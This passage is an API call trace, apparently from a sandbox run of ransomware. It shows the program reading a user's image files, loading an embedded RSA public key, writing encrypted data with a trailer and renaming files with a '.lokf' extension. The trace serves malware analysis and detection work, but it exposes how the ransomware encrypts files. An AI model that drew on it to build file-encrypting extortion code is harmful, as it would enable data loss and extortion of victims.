0x326a688 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3a0 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.037] GetCurrentThreadId () returned 0x9e0 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7d898 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.037] GetCurrentThreadId () returned 0x9e0 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3a0 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3b8 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b388 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3d0 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3a0 | out: hHeap=0x660000) returned 1 [0059.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3a0 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3a0 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b388 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b370 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83070 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x7e94, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x7e94, lpOverlapped=0x0) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.040] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7e99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.040] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.040] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.041] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.041] CloseHandle (hObject=0x5cc) returned 1 [0059.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.042] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3iuJ8NWM9DLs-PEj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3iuj8nwm9dls-pej.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3iuJ8NWM9DLs-PEj.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3iuj8nwm9dls-pej.bmp.lokf")) returned 1 [0059.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.042] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.043] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.043] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58b2bf0, ftCreationTime.dwHighDateTime=0x1d4d39a, ftLastAccessTime.dwLowDateTime=0xa98a9b0, ftLastAccessTime.dwHighDateTime=0x1d4c846, ftLastWriteTime.dwLowDateTime=0xa98a9b0, ftLastWriteTime.dwHighDateTime=0x1d4c846, nFileSizeHigh=0x0, nFileSizeLow=0x12725, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6othUkm8ekP4Ec7T.gif", cAlternateFileName="6OTHUK~1.GIF")) returned 1 [0059.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.043] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.043] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6othUkm8ekP4Ec7T.gif") returned=".gif" [0059.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6othUkm8ekP4Ec7T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6othukm8ekp4ec7t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.043] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=75557) returned 1 [0059.043] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.046] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x126ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.046] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.047] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.047] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.047] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.047] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12725, lpOverlapped=0x0) returned 1 [0059.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.047] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.047] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.048] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.048] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.048] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.048] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.048] GetLastError () returned 0x0 [0059.048] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.048] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.048] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.048] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.048] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12730) returned 0x9c83710 [0059.049] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83070 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b370 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c830b8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b388 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3b8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3d0 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.049] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.049] 